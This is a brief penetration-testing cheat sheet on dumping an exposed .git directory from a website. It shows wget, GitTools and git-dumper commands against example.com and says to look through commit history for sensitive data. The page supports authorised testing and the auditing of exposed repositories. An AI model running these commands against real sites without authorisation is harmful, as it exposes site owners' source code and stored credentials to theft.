Dump Git Repository from Website
Last modified: 2023-07-06
If we can have permission to access git repositoy in target website, we can dump the git repository and investigate git logs or histories to get sensitive information.
We can simply use
wget command in Linux to download the git repository.
After that, we can investigate files or all histories.
# -r: Recursive
wget -r https://example.com/.git/
git log --stat
git checkout <commit_id>
GitTools downloads Git repository of the web application.
To dump the repository, execute the following commands.
chmod +x gitdumper.sh
./gitdumper.sh https://example.com/.git/ ./example
We should get the git repository in local.
Then extract the entire project by executing the following.
chmod +x extractor.sh
./extractor.sh ./example ./new_example
Now we retrieve the entire git project from website.
It is stored in “./new_example” folder. We can investigate the repository.
git-dumper is an useful Python package.
pip install git-dumper
git-dumper https://example.com/.git ./dumped